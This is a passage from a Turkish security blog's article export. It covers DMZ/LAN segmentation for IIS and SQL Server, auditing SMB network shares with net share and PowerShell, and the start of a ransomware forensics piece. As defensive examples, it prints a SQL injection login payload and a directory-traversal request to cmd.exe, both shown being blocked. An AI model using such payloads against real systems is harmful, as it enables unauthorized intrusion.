ANY\n<\/code><\/pre>\n<blockquote>\n<p>\ud83d\udd10 Firewall + OS Firewall = <strong>&Ccedil;ift kilit<\/strong><\/p>\n<\/blockquote>\n<hr>\n<h2>Kimlik Do\u011frulama: En S\u0131k Yap\u0131lan Hata<\/h2>\n<h3>Yanl\u0131\u015f<\/h3>\n<ul>\n<li>\n<p><code>sa<\/code> \/ <code>root<\/code> kullan\u0131c\u0131lar\u0131<\/p>\n<\/li>\n<li>\n<p>Full permission DB user<\/p>\n<\/li>\n<\/ul>\n<h3>Do\u011fru<\/h3>\n<ul>\n<li>\n<p>Sadece ilgili veritaban\u0131<\/p>\n<\/li>\n<li>\n<p>Yetkiler:<\/p>\n<ul>\n<li>\n<p>SELECT<\/p>\n<\/li>\n<li>\n<p>INSERT<\/p>\n<\/li>\n<li>\n<p>UPDATE<\/p>\n<\/li>\n<\/ul>\n<\/li>\n<li>\n<p>DROP \/ ALTER yok<\/p>\n<\/li>\n<\/ul>\n<p>Bu sayede web uygulamas\u0131 ele ge&ccedil;irilse bile zarar s\u0131n\u0131rl\u0131 kal\u0131r.<\/p>\n<hr>\n<h2>IIS Taraf\u0131nda G&uuml;venlik &Ouml;nlemleri<\/h2>\n<p><strong>Connection String<\/strong><\/p>\n<ul>\n<li>\n<p>\u015eifreli tutulmal\u0131<\/p>\n<\/li>\n<li>\n<p>Web root d\u0131\u015f\u0131nda saklanmal\u0131<\/p>\n<\/li>\n<li>\n<p>M&uuml;mk&uuml;nse environment variable kullan\u0131lmal\u0131<\/p>\n<\/li>\n<\/ul>\n<p><strong>Ek &Ouml;nlemler<\/strong><\/p>\n<ul>\n<li>\n<p>Connection pool limitli<\/p>\n<\/li>\n<li>\n<p>Timeout de\u011ferleri k\u0131sa<\/p>\n<\/li>\n<li>\n<p>Parametreli sorgular \/ ORM kullan\u0131m\u0131<\/p>\n<\/li>\n<li>\n<p>SQL Injection korumas\u0131<\/p>\n<\/li>\n<\/ul>\n<hr>\n<h2>DMZ &rarr; LAN Ba\u011flant\u0131 Testi<\/h2>\n<p>IIS sunucusundan:<\/p>\n<pre><code>telnet 192.168.40.10 1433\n<\/code><\/pre>\n<p>Firewall log&rsquo;unda:<\/p>\n<pre><code>ALLOW DMZ(10.10.10.2) &rarr; VLAN40(192.168.40.10) TCP 1433\n<\/code><\/pre>\n<p>Bunun d\u0131\u015f\u0131nda <strong>tek bir port<\/strong> g&ouml;r&uuml;rseniz:<\/p>\n<blockquote>\n<p>\u26a0\ufe0f Yanl\u0131\u015f yap\u0131land\u0131rma vard\u0131r.<\/p>\n<\/blockquote>\n<hr>\n<h2>Firewall Rule Set (&Ouml;zet)<\/h2>\n<p><strong>WAN &rarr; DMZ<\/strong><\/p>\n<ul>\n<li>\n<p>HTTPS (443) &rarr; IIS<\/p>\n<\/li>\n<\/ul>\n<p><strong>DMZ &rarr; VLAN40<\/strong><\/p>\n<ul>\n<li>\n<p>Sadece IIS &rarr; SQL (TCP 1433)<\/p>\n<\/li>\n<\/ul>\n<p><strong>VLAN40 &rarr; DMZ<\/strong><\/p>\n<ul>\n<li>\n<p>Sadece y&ouml;netim (RDP \/ SSH)<\/p>\n<\/li>\n<\/ul>\n<p><strong>DMZ &rarr; LAN \/ User VLAN<\/strong><\/p>\n<ul>\n<li>\n<p>Tamamen kapal\u0131<\/p>\n<\/li>\n<\/ul>\n<p><strong>En altta<\/strong><\/p>\n<ul>\n<li>\n<p>Default deny (log a&ccedil;\u0131k)<\/p>\n<\/li>\n<\/ul>\n<hr>\n<h2>Reverse Proxy + SSL Offload ile Bir &Uuml;st Seviye<\/h2>\n<p>Daha geli\u015fmi\u015f yap\u0131larda, IIS&rsquo;in &ouml;n&uuml;ne <strong>Reverse Proxy<\/strong> eklenir.<\/p>\n<p><img src=\"https:\/\/media.geeksforgeeks.org\/wp-content\/uploads\/20250322144523695986\/reverse_proxy_server.webp?utm_source=chatgpt.com\" alt=\"Image\"><\/p>\n<p><strong>DMZ<\/strong><\/p>\n<ul>\n<li>\n<p>Reverse Proxy (Nginx) &rarr; <code>10.10.10.10<\/code><\/p>\n<\/li>\n<li>\n<p>IIS Web Server &rarr; <code>10.10.10.2<\/code><\/p>\n<\/li>\n<\/ul>\n<p><strong>Ak\u0131\u015f<\/strong><\/p>\n<pre><code>Internet &rarr; Reverse Proxy (HTTPS)\nReverse Proxy &rarr; IIS (HTTP &ndash; internal)\nIIS &rarr; SQL (TCP 1433)\n<\/code><\/pre>\n<h3>SSL Offload Neden &Ouml;nemli?<\/h3>\n<ul>\n<li>\n<p>Sertifika tek noktada<\/p>\n<\/li>\n<li>\n<p>TLS a&ccedil;\u0131klar\u0131 merkezi y&ouml;netilir<\/p>\n<\/li>\n<li>\n<p>WAF \/ rate-limit \/ header kontrol&uuml;<\/p>\n<\/li>\n<li>\n<p>Daha temiz ve anlaml\u0131 loglar<\/p>\n<\/li>\n<li>\n<p>Performans art\u0131\u015f\u0131<\/p>\n<\/li>\n<\/ul>\n<hr>\n<h2>Ger&ccedil;ek&ccedil;i Sald\u0131r\u0131 Senaryolar\u0131<\/h2>\n<h3>SQL Injection Denemesi<\/h3>\n<pre><code>GET \/login.aspx?user=admin' OR 1=1--\n<\/code><\/pre>\n<p><strong>Reverse Proxy Log<\/strong><\/p>\n<pre><code>ACTION=BLOCK\nREASON=SQL_INJECTION_PATTERN\n<\/code><\/pre>\n<p>IIS ve SQL&rsquo;e ula\u015famaz<\/p>\n<hr>\n<h3>Directory Traversal<\/h3>\n<pre><code>GET \/..\/..\/windows\/system32\/cmd.exe\n<\/code><\/pre>\n<p><strong>Sonu&ccedil;<\/strong><\/p>\n<ul>\n<li>\n<p>Reverse proxy taraf\u0131ndan bloklan\u0131r<\/p>\n<\/li>\n<\/ul>\n<hr>\n<h3>Brute Force Login<\/h3>\n<ul>\n<li>\n<p>Rate-limit devreye girer<\/p>\n<\/li>\n<li>\n<p>Firewall IPS ba\u011flant\u0131y\u0131 keser<\/p>\n<\/li>\n<\/ul>\n<hr>\n<h3>IIS Ele Ge&ccedil;irilirse Ne Olur?<\/h3>\n<ul>\n<li>\n<p>SQL&rsquo;e sadece uygulama yetkisiyle eri\u015filir<\/p>\n<\/li>\n<li>\n<p>User VLAN&rsquo;lara ge&ccedil;i\u015f yap\u0131lamaz<\/p>\n<\/li>\n<li>\n<p>Domain ele ge&ccedil;irilemez<\/p>\n<\/li>\n<\/ul>\n<p><strong>Zarar uygulama + DB tablosu seviyesinde kal\u0131r<\/strong><\/p>\n<hr>\n<h2>Asla Yap\u0131lmamas\u0131 Gerekenler<\/h2>\n<ul>\n<li>\n<p>DB&rsquo;yi DMZ&rsquo;ye koymak<\/p>\n<\/li>\n<li>\n<p>DMZ &rarr; LAN ANY kural\u0131 a&ccedil;mak<\/p>\n<\/li>\n<li>\n<p>DB&rsquo;yi kullan\u0131c\u0131 VLAN&rsquo;\u0131na koymak<\/p>\n<\/li>\n<li>\n<p><code>sa<\/code> \/ <code>root<\/code> kullanmak<\/p>\n<\/li>\n<li>\n<p>Management VLAN&rsquo;a kullan\u0131c\u0131 PC almak<\/p>\n<\/li>\n<\/ul>\n<hr>\n<h2>Sonu&ccedil;<\/h2>\n<p>DMZ&rsquo;de IIS olabilir.<br>Veritaban\u0131 LAN&rsquo;da olmal\u0131d\u0131r.<br>Arada <strong>tek y&ouml;nl&uuml;, tek IP, tek port, loglanan<\/strong> bir firewall kural\u0131 bulunur.<\/p>\n<p>Bu yakla\u015f\u0131m:<\/p>\n<ul>\n<li>\n<p>Ger&ccedil;ek DMZ izolasyonu sa\u011flar<\/p>\n<\/li>\n<li>\n<p>Sald\u0131r\u0131 y&uuml;zeyini ciddi bi&ccedil;imde daralt\u0131r<\/p>\n<\/li>\n<li>\n<p>Kurumsal a\u011flarda y\u0131llard\u0131r kullan\u0131lan <strong>kan\u0131tlanm\u0131\u015f bir standartt\u0131r<\/strong><\/p>\n<\/li>\n<\/ul>\n<blockquote>\n<p><strong>Reverse Proxy sald\u0131r\u0131y\u0131 g&ouml;r&uuml;r,<br>Firewall s\u0131n\u0131rlar,<br>DMZ hapseder,<br>LAN korur.<\/strong><\/p>\n<\/blockquote>","excerpt":"DMZ\u2019de IIS + LAN\u2019da SQL Server\nDo\u011fru Mimari, G\u00fcvenli Firewall Kurallar\u0131 ve Ger\u00e7ek Sald\u0131r\u0131 Senaryolar\u0131","created_at":"2025-12-21 14:41:46","updated_at":"2026-09-23 16:33:18","category_id":7,"view_count":592,"reading_time":5,"status":"published","editor_choice":0,"is_editor_choice":0,"published_at":"2025-12-21 11:41:46","featured_image":"\/uploads\/images\/2025\/12\/6947dce9bb40d_1766317289.png","slug":"dmz-de-iis-lan-da-sql-server","category_name":"Cyber Security","category_slug":"cyber-security","category_color":"#10b981"},{"id":367,"title":"Network Shares Denetimini Hafife Almay\u0131n","content":"<p>Kurumsal a\u011flarda g&uuml;venlik a&ccedil;\u0131klar\u0131 denildi\u011finde akla genellikle&nbsp;<strong>zararl\u0131 yaz\u0131l\u0131mlar, zay\u0131f parolalar veya g&uuml;ncel olmayan sistemler<\/strong> gelir.<br>Ancak pratikte en s\u0131k kar\u015f\u0131la\u015f\u0131lan &mdash; ve en &ccedil;ok g&ouml;zden ka&ccedil;an &mdash; risklerden biri <strong>a&ccedil;\u0131k unutulmu\u015f network payla\u015f\u0131mlar\u0131d\u0131r<\/strong>.<\/p>\n<p><iframe style=\"width: 674px; height: 379px;\" src=\"https:\/\/www.youtube.com\/embed\/uFDepQ-aC4M\" width=\"674\" height=\"379\" allowfullscreen=\"allowfullscreen\"><\/iframe><\/p>\n<p>Bir dosya transferi i&ccedil;in ge&ccedil;ici olarak a&ccedil;\u0131lan bir klas&ouml;r,<br>bir departmana &ldquo;\u015fimdilik&rdquo; verilen eri\u015fim,<br>ya da test ama&ccedil;l\u0131 payla\u015f\u0131ma a&ccedil;\u0131lan bir dizin&hellip;<\/p>\n<p>Bunlar\u0131n her biri, fark edilmeden <strong>aylarca hatta y\u0131llarca sessiz bir a&ccedil;\u0131k kap\u0131<\/strong> h&acirc;line gelebilir.<\/p>\n<p>Bir IT y&ouml;neticisi i&ccedil;in sorulmas\u0131 gereken kritik soru \u015fudur:<\/p>\n<blockquote>\n<p><strong>&ldquo;A\u011f\u0131mda \u015fu anda kim, neyi, neden payla\u015f\u0131yor?&rdquo;<\/strong><\/p>\n<\/blockquote>\n<p>Bu soruya net ve h\u0131zl\u0131 bir cevap veremiyorsan\u0131z,<br>orada <strong>y&ouml;netilmeyen bir risk<\/strong> vard\u0131r.<\/p>\n<p>Kurumsal siber g&uuml;venlik stratejilerinde a\u011f payla\u015f\u0131mlar\u0131 (network shares), genellikle zararl\u0131 yaz\u0131l\u0131mlar veya zay\u0131f parolalar kadar dikkat &ccedil;ekmese de asl\u0131nda <strong>en s\u0131k kar\u015f\u0131la\u015f\u0131lan ve en &ccedil;ok g&ouml;zden ka&ccedil;an<\/strong> risk alanlar\u0131ndan biridir. Bir dosya transferi i&ccedil;in ge&ccedil;ici a&ccedil;\u0131lan klas&ouml;rler veya test ama&ccedil;l\u0131 payla\u015f\u0131lan dizinler, aylar hatta y\u0131llar boyunca <strong>\"sessiz bir a&ccedil;\u0131k kap\u0131\"<\/strong> olarak kalabilmektedir.<\/p>\n<p>A\u011f payla\u015f\u0131mlar\u0131n\u0131n kurumsal g&uuml;venlikteki kritik &ouml;nemi ve bar\u0131nd\u0131rd\u0131\u011f\u0131 temel riskler \u015fu \u015fekilde detayland\u0131r\u0131labilir:<\/p>\n<h3>Kritik &Ouml;nemi ve Y&ouml;netim Gereklili\u011fi<\/h3>\n<p>A\u011f payla\u015f\u0131mlar\u0131 do\u011frudan <strong>veriye eri\u015fim<\/strong> anlam\u0131na geldi\u011fi i&ccedil;in kurumsal stratejinin merkezinde yer almal\u0131d\u0131r. Ger&ccedil;ek g&uuml;venlik, sadece tehditleri engellemek de\u011fil, <strong>kurumun neye sahip oldu\u011funu ve bu verilere kimlerin eri\u015fti\u011fini bilmesidir<\/strong>. E\u011fer bir IT y&ouml;neticisi a\u011fda \"\u015fu anda kimin, neyi, neden payla\u015ft\u0131\u011f\u0131n\u0131\" net bir \u015fekilde a&ccedil;\u0131klayam\u0131yorsa, orada <strong>y&ouml;netilmeyen bir risk<\/strong> mevcuttur.<\/p>\n<h3>Temel Riskler<\/h3>\n<p>Yanl\u0131\u015f yap\u0131land\u0131r\u0131lm\u0131\u015f veya a&ccedil;\u0131k unutulmu\u015f a\u011f payla\u015f\u0131mlar\u0131 \u015fu ciddi sorunlara yol a&ccedil;abilir:<\/p>\n<ul>\n<li><strong>Yatay Yay\u0131lma (Lateral Movement):<\/strong> Fidye yaz\u0131l\u0131mlar\u0131n\u0131n (ransomware) a\u011f i&ccedil;erisinde makineler aras\u0131nda kolayca yay\u0131lmas\u0131na zemin haz\u0131rlar.<\/li>\n<li><strong>Yetkisiz Eri\u015fim ve Veri S\u0131z\u0131nt\u0131s\u0131:<\/strong> Hassas dosyalara yetkisiz kullan\u0131c\u0131lar\u0131n ula\u015fmas\u0131na veya i&ccedil; tehditlerin fark edilmeden veri s\u0131zd\u0131rmas\u0131na neden olur.<\/li>\n<li><strong>Loglarda Sessiz Kalma:<\/strong> Bu risklerin &ccedil;o\u011fu sistem loglar\u0131nda alarm &uuml;retmez veya \"ba\u011f\u0131rmaz\"; sadece orada sessizce beklerler.<\/li>\n<li><strong>Uyum Sorunlar\u0131:<\/strong> KVKK ve ISO 27001 gibi yasal denetim ve uyumluluk s&uuml;re&ccedil;lerinde ciddi eksiklikler yarat\u0131r.<\/li>\n<\/ul>\n<h3>En Tehlikeli Payla\u015f\u0131m T&uuml;rleri<\/h3>\n<p>Kaynaklara g&ouml;re en tehlikeli payla\u015f\u0131mlar, <strong>\"kimsenin hat\u0131rlamad\u0131\u011f\u0131 ama herkesin eri\u015febildi\u011fi\"<\/strong> payla\u015f\u0131mlard\u0131r. &Ouml;zellikle \u015funlar y&uuml;ksek risk ta\u015f\u0131r:<\/p>\n<ul>\n<li><strong>\"Everyone\"<\/strong> veya &ccedil;ok geni\u015f gruplara a&ccedil;\u0131k olan dizinler.<\/li>\n<li>Eski projelere ait, i\u015fi bitmi\u015f ancak kapat\u0131lmam\u0131\u015f klas&ouml;rler.<\/li>\n<li>Backup (yedekleme) veya log klas&ouml;rlerinin yanl\u0131\u015fl\u0131kla payla\u015f\u0131ma a&ccedil;\u0131lmas\u0131.<\/li>\n<li>Kullan\u0131c\u0131lar\u0131n kendi profil dizinleri alt\u0131nda manuel olarak a&ccedil;t\u0131\u011f\u0131 payla\u015f\u0131mlar,.<\/li>\n<\/ul>\n<h3>Stratejik Yakla\u015f\u0131m ve Denetim<\/h3>\n<p>A\u011f payla\u015f\u0131mlar\u0131n\u0131n denetimi, \"bir kez yap\u0131ld\u0131 ve bitti\" denilecek bir i\u015f de\u011fildir; bu s&uuml;recin <strong>periyodik, raporlanabilir ve standartla\u015ft\u0131r\u0131lm\u0131\u015f<\/strong> olmas\u0131 gerekir. Tek bir makine &uuml;zerinde <code>net share<\/code> komutuyla yerel g&ouml;r&uuml;n&uuml;rl&uuml;k sa\u011flanabilse de, kurumsal a\u011flarda as\u0131l de\u011fer <strong>Active Directory (domain) seviyesinde g&ouml;r&uuml;n&uuml;rl&uuml;k<\/strong> elde etmektir,. PowerShell gibi ara&ccedil;lar kullan\u0131larak domain genelindeki t&uuml;m a&ccedil;\u0131k SMB payla\u015f\u0131mlar\u0131n\u0131n d&uuml;zenli olarak taranmas\u0131, \"bilmiyordum\" l&uuml;ks&uuml;n&uuml; ortadan kald\u0131rarak g&uuml;venli\u011fi art\u0131r\u0131r,.<\/p>\n<p>A\u011f payla\u015f\u0131mlar\u0131n\u0131n y&ouml;netimi, binan\u0131n giri\u015fine en geli\u015fmi\u015f &ccedil;elik kap\u0131y\u0131 (firewall\/antivir&uuml;s) tak\u0131p, arka taraftaki pencerelerden birini (a&ccedil;\u0131k unutulmu\u015f klas&ouml;r) sonuna kadar a&ccedil;\u0131k b\u0131rakmaya benzer; kap\u0131 ne kadar sa\u011flam olursa olsun, pencereyi bilen biri i&ccedil;eri s\u0131zabilir.<\/p>\n<p>Yanl\u0131\u015f yap\u0131land\u0131r\u0131lm\u0131\u015f veya a&ccedil;\u0131k unutulmu\u015f a\u011f payla\u015f\u0131mlar\u0131, kurumsal a\u011flarda genellikle zararl\u0131 yaz\u0131l\u0131mlar veya zay\u0131f parolalar kadar dikkat &ccedil;ekmese de en s\u0131k kar\u015f\u0131la\u015f\u0131lan ve en &ccedil;ok g&ouml;zden ka&ccedil;an g&uuml;venlik risklerinden biridir. Bu payla\u015f\u0131mlar, fark edilmeden aylar hatta y\u0131llar boyunca <strong>\"sessiz bir a&ccedil;\u0131k kap\u0131\"<\/strong> olarak kalabilmektedir.<\/p>\n<p>Kaynaklara g&ouml;re, yanl\u0131\u015f yap\u0131land\u0131r\u0131lm\u0131\u015f a\u011f payla\u015f\u0131mlar\u0131n\u0131n neden olabilece\u011fi temel siber riskler \u015funlard\u0131r:<\/p>\n<ul>\n<li><strong>Yetkisiz Veri Eri\u015fimi:<\/strong> Hassas dosyalar\u0131n yetkisi olmayan kullan\u0131c\u0131lar taraf\u0131ndan g&ouml;r&uuml;nt&uuml;lenmesine veya de\u011fi\u015ftirilmesine yol a&ccedil;ar.<\/li>\n<li><strong>Yatay Yay\u0131lma (Lateral Movement):<\/strong> &Ouml;zellikle <strong>fidye yaz\u0131l\u0131mlar\u0131n\u0131n (ransomware)<\/strong> a\u011f i&ccedil;erisinde makineler aras\u0131nda kolayca yay\u0131lmas\u0131na zemin haz\u0131rlar.<\/li>\n<li><strong>\u0130&ccedil; Tehditler:<\/strong> K&ouml;t&uuml; niyetli veya dikkatsiz &ccedil;al\u0131\u015fanlar\u0131n (i&ccedil; tehditlerin), fark edilmeden veri s\u0131zd\u0131rmas\u0131na olanak tan\u0131r.<\/li>\n<li><strong>Denetim ve Uyumluluk Sorunlar\u0131:<\/strong> <strong>KVKK ve ISO 27001<\/strong> gibi yasal d&uuml;zenlemeler ve standartlara uyum konusunda ciddi a&ccedil;\u0131klar yaratarak yasal riskler olu\u015fturur.<\/li>\n<li><strong>G&ouml;r&uuml;nmezlik ve Log Sessizli\u011fi:<\/strong> Bu t&uuml;r risklerin en tehlikeli y&ouml;nlerinden biri, <strong>loglarda \"ba\u011f\u0131rmamas\u0131\"<\/strong> veya sistemlerde otomatik bir alarm &uuml;retmemesidir; risk orada sessizce bekler.<\/li>\n<li><strong>Y&ouml;netilemeyen Risk:<\/strong> E\u011fer bir IT y&ouml;neticisi a\u011fda \"kimin, neyi, neden payla\u015ft\u0131\u011f\u0131n\u0131\" net olarak g&ouml;remiyorsa, bu durum do\u011frudan y&ouml;netilemeyen bir riskin varl\u0131\u011f\u0131na i\u015farettir.<\/li>\n<\/ul>\n<p>&Ouml;zellikle <strong>\"Everyone\"<\/strong> veya &ccedil;ok geni\u015f gruplara a&ccedil;\u0131k dizinler, eski projelere ait unutulmu\u015f klas&ouml;rler, kullan\u0131c\u0131lar\u0131n manuel olarak a&ccedil;t\u0131\u011f\u0131 payla\u015f\u0131mlar ve yanl\u0131\u015fl\u0131kla payla\u015f\u0131lan <strong>yedekleme (backup) veya log klas&ouml;rleri<\/strong> en y&uuml;ksek risk grubunda yer almaktad\u0131r.<\/p>\n<p>Bu durumu bir binan\u0131n g&uuml;venli\u011fine benzetebiliriz: Binan\u0131n giri\u015fine en geli\u015fmi\u015f &ccedil;elik kap\u0131y\u0131 ve g&uuml;venlik kameralar\u0131n\u0131 (firewall ve antivir&uuml;s) yerle\u015ftirseniz bile, arka tarafta kimsenin hat\u0131rlamad\u0131\u011f\u0131 a&ccedil;\u0131k bir pencere (hatal\u0131 a\u011f payla\u015f\u0131m\u0131) b\u0131rakt\u0131\u011f\u0131n\u0131zda, t&uuml;m g&uuml;venlik &ouml;nlemleri i\u015flevsiz kalabilir.<\/p>\n<hr>\n<h2>Neden Network Payla\u015f\u0131mlar\u0131 Tehlikelidir?<\/h2>\n<p>Network payla\u015f\u0131mlar\u0131 do\u011frudan <strong>veriye eri\u015fim<\/strong> anlam\u0131na gelir.<br>Yanl\u0131\u015f yap\u0131land\u0131r\u0131lm\u0131\u015f bir payla\u015f\u0131m;<\/p>\n<ul>\n<li>\n<p>Yetkisiz kullan\u0131c\u0131lar\u0131n hassas dosyalara ula\u015fmas\u0131na<\/p>\n<\/li>\n<li>\n<p>Fidye yaz\u0131l\u0131mlar\u0131n\u0131n yatay olarak yay\u0131lmas\u0131na<\/p>\n<\/li>\n<li>\n<p>\u0130&ccedil; tehditlerin fark edilmeden veri s\u0131zd\u0131rmas\u0131na<\/p>\n<\/li>\n<li>\n<p>Denetim ve uyumluluk (KVKK, ISO 27001 vb.) sorunlar\u0131na<\/p>\n<\/li>\n<\/ul>\n<p>neden olabilir.<\/p>\n<p>&Uuml;stelik bu risklerin &ccedil;o\u011fu <strong>loglarda ba\u011f\u0131rmaz<\/strong>, alarm &uuml;retmez.<br>Sadece oradad\u0131r&hellip; sessizce.<\/p>\n<hr>\n<h2>Yakla\u015f\u0131m 1: Lokal G&ouml;r&uuml;n&uuml;rl&uuml;k (Tek Makine Kontrol&uuml;)<\/h2>\n<p>Basit ama etkili bir ilk ad\u0131m olarak, \u015f&uuml;pheli herhangi bir Windows makinesinde a\u015fa\u011f\u0131daki komut yeterlidir.<\/p>\n<p><strong>CMD (Run as Administrator):<\/strong><\/p>\n<pre><code class=\"language-cmd\">net share\n<\/code><\/pre>\n<p>Bu komut tek ekranda \u015funlar\u0131 g&ouml;sterir:<\/p>\n<ul>\n<li>\n<p>A&ccedil;\u0131k kullan\u0131c\u0131 payla\u015f\u0131mlar\u0131<\/p>\n<\/li>\n<li>\n<p>Gizli y&ouml;netici payla\u015f\u0131mlar\u0131 (C$, ADMIN$)<\/p>\n<\/li>\n<li>\n<p>Beklenmeyen veya unutulmu\u015f klas&ouml;rler<\/p>\n<\/li>\n<\/ul>\n<p>&Ouml;zellikle <strong>kullan\u0131c\u0131 taraf\u0131ndan manuel a&ccedil;\u0131lm\u0131\u015f<\/strong> payla\u015f\u0131mlar burada h\u0131zl\u0131ca fark edilir.<\/p>\n<p>Bu kontrol, bireysel makineler i&ccedil;in iyi bir ba\u015flang\u0131&ccedil;t\u0131r;<br>ancak kurumsal a\u011flar i&ccedil;in <strong>yeterli de\u011fildir<\/strong>.<\/p>\n<hr>\n<h2>Yakla\u015f\u0131m 2: Domain Genelinde G&ouml;r&uuml;n&uuml;rl&uuml;k (Ger&ccedil;ek Denetim)<\/h2>\n<p>Active Directory ortamlar\u0131nda as\u0131l de\u011fer,<br>lokal de\u011fil <strong>domain seviyesinde g&ouml;r&uuml;n&uuml;rl&uuml;k<\/strong> sa\u011flamakt\u0131r.<\/p>\n<p>Domain Admin yetkileriyle &ccedil;al\u0131\u015ft\u0131r\u0131labilecek &ouml;rnek bir PowerShell yakla\u015f\u0131m\u0131:<\/p>\n<pre><code class=\"language-powershell\">Get-ADComputer -Filter * | ForEach-Object {\n    try {\n        $shares = Get-SmbShare -CimSession $_.Name -ErrorAction SilentlyContinue\n        if ($shares) {\n            [PSCustomObject]@{\n                ComputerName = $_.Name\n                ShareName    = $shares.Name -join ', '\n                Path         = $shares.Path -join ' | '\n            }\n        }\n    } catch {}\n} | Format-Table -AutoSize\n<\/code><\/pre>\n<p>Bu script sayesinde:<\/p>\n<ul>\n<li>\n<p>Domain&rsquo;e ba\u011fl\u0131 t&uuml;m makineler taran\u0131r<\/p>\n<\/li>\n<li>\n<p>A&ccedil;\u0131k SMB payla\u015f\u0131mlar\u0131 listelenir<\/p>\n<\/li>\n<li>\n<p>Hangi makinede, hangi klas&ouml;r&uuml;n payla\u015f\u0131ld\u0131\u011f\u0131 netle\u015fir<\/p>\n<\/li>\n<\/ul>\n<p>Bu noktadan sonra art\u0131k <strong>&ldquo;bilmiyordum&rdquo;<\/strong> deme l&uuml;ks&uuml; yoktur.<\/p>\n<hr>\n<h2>Teknik Not<\/h2>\n<p>Bu komutun &ccedil;al\u0131\u015fabilmesi i&ccedil;in:<\/p>\n<ul>\n<li>\n<p><strong>Active Directory PowerShell mod&uuml;l&uuml; (RSAT)<\/strong> y&uuml;kl&uuml; olmal\u0131d\u0131r<\/p>\n<\/li>\n<li>\n<p>Aksi h&acirc;lde <code>Get-ADComputer<\/code> hatas\u0131 al\u0131n\u0131r<\/p>\n<\/li>\n<\/ul>\n<p>Kurumsal ortamlarda bu mod&uuml;l genellikle Domain Controller veya y&ouml;netim makinelerinde haz\u0131r bulunur.<\/p>\n<hr>\n<h2>En Tehlikeli Payla\u015f\u0131mlar Hangileridir?<\/h2>\n<blockquote>\n<p><strong>&ldquo;En tehlikeli payla\u015f\u0131mlar,<br>kimsenin hat\u0131rlamad\u0131\u011f\u0131 ama herkesin eri\u015febildi\u011fi payla\u015f\u0131mlard\u0131r.&rdquo;<\/strong><\/p>\n<\/blockquote>\n<p>&Ouml;zellikle dikkat edilmesi gerekenler:<\/p>\n<ul>\n<li>\n<p><code>Everyone<\/code> veya geni\u015f gruplara a&ccedil;\u0131k dizinler<\/p>\n<\/li>\n<li>\n<p>Eski projelere ait unutulmu\u015f klas&ouml;rler<\/p>\n<\/li>\n<li>\n<p>Kullan\u0131c\u0131 profil dizinleri alt\u0131ndaki payla\u015f\u0131mlar<\/p>\n<\/li>\n<li>\n<p>Backup veya log klas&ouml;rlerinin yanl\u0131\u015fl\u0131kla payla\u015f\u0131lmas\u0131<\/p>\n<\/li>\n<\/ul>\n<hr>\n<h2>Denetim Tek Seferlik Olmamal\u0131<\/h2>\n<p>Network share kontrolleri;<\/p>\n<ul>\n<li>\n<p>Tek seferlik yap\u0131lan bir i\u015f de\u011fil<\/p>\n<\/li>\n<li>\n<p>&ldquo;Bug&uuml;n bakt\u0131k, tamam&rdquo; denilecek bir konu de\u011fil<\/p>\n<\/li>\n<\/ul>\n<p>Bu s&uuml;re&ccedil;:<\/p>\n<ul>\n<li>\n<p><strong>Periyodik<\/strong><\/p>\n<\/li>\n<li>\n<p><strong>Raporlanabilir<\/strong><\/p>\n<\/li>\n<li>\n<p><strong>Standartla\u015ft\u0131r\u0131lm\u0131\u015f<\/strong><\/p>\n<\/li>\n<\/ul>\n<p>olmal\u0131d\u0131r.<\/p>\n<p>Aksi h&acirc;lde en iyi firewall, en g&uuml;ncel antivir&uuml;s bile<br>i&ccedil;erideki bu <strong>sessiz a&ccedil;\u0131k kap\u0131y\u0131<\/strong> kapatamaz.<\/p>\n<hr>\n<p>Network payla\u015f\u0131mlar\u0131 k&uuml;&ccedil;&uuml;k gibi g&ouml;r&uuml;nen ama etkisi b&uuml;y&uuml;k risklerdir.<br>Ger&ccedil;ek g&uuml;venlik, sadece tehditleri engellemek de\u011fil,<br><strong>neye sahip oldu\u011funuzu ve kimin eri\u015fti\u011fini bilmektir.<\/strong><\/p>\n<p>Bug&uuml;n kendinize \u015fu soruyu sorun:<\/p>\n<blockquote>\n<p><strong>&ldquo;\u015eu anda a\u011f\u0131mda ka&ccedil; payla\u015f\u0131m var ve ben bunlar\u0131n ka&ccedil;\u0131n\u0131 ger&ccedil;ekten biliyorum?&rdquo;<\/strong><\/p>\n<\/blockquote>\n<p>Cevap net de\u011filse,<br>ilk risk zaten ortaya &ccedil;\u0131km\u0131\u015f demektir.<\/p>","excerpt":"Kurumsal a\u011flarda g\u00fcvenlik a\u00e7\u0131klar\u0131 denildi\u011finde akla genellikle\u00a0zararl\u0131 yaz\u0131l\u0131mlar, zay\u0131f parolalar veya g\u00fcncel olmayan sistemler gelir.\nAncak pratikte en s\u0131k kar\u015f\u0131la\u015f\u0131lan \u2014 ve en \u00e7ok g\u00f6zden ka\u00e7an \u2014 risklerden biri a\u00e7\u0131k unutulmu\u015f network payla\u015f\u0131mlar\u0131d\u0131r.","created_at":"2025-12-21 08:55:44","updated_at":"2026-09-23 13:09:30","category_id":7,"view_count":575,"reading_time":9,"status":"published","editor_choice":0,"is_editor_choice":0,"published_at":"2025-12-21 05:55:44","featured_image":"\/uploads\/images\/2025\/12\/69478bd4b8286_1766296532.png","slug":"network-shares-denetimini-hafife-almayin","category_name":"Cyber Security","category_slug":"cyber-security","category_color":"#10b981"},{"id":362,"title":"Ransomware \u0130ncelemelerinde Dosya Eri\u015fim Analizi Nas\u0131l Yap\u0131l\u0131r?","content":"<p>Ransomware sald\u0131r\u0131lar\u0131 g&uuml;n&uuml;m&uuml;zde kurumlar\u0131n kar\u015f\u0131la\u015ft\u0131\u011f\u0131 en kritik tehditlerin ba\u015f\u0131nda geliyor. Modern fidye yaz\u0131l\u0131mlar\u0131 yaln\u0131zca verileri \u015fifrelemekle kalm\u0131yor; ayn\u0131 zamanda dosya sisteminde ola\u011fan d\u0131\u015f\u0131 bir aktivite b\u0131rakarak izlerini de saklamaya &ccedil;al\u0131\u015f\u0131yor. Bu nedenle bir ransomware vakas\u0131nda&nbsp;<strong>dosya eri\u015fim analizi (File Access Analysis)<\/strong>, sald\u0131r\u0131n\u0131n yay\u0131l\u0131m\u0131n\u0131 anlamak ve etki alan\u0131n\u0131 belirlemek i&ccedil;in en &ouml;nemli ad\u0131mlardan biridir.<\/p>\n<p>Bu yaz\u0131da, ransomware incelemelerinde dosya eri\u015fim analizinin nas\u0131l yap\u0131ld\u0131\u011f\u0131n\u0131, hangi ara&ccedil;lar\u0131n kullan\u0131ld\u0131\u011f\u0131n\u0131 ve ad\u0131m ad\u0131m uygulanabilir bir yakla\u015f\u0131m\u0131 ele alaca\u011f\u0131z.<\/p>\n<hr>\n<h2><iframe style=\"width: 704px; height: 395px;\" 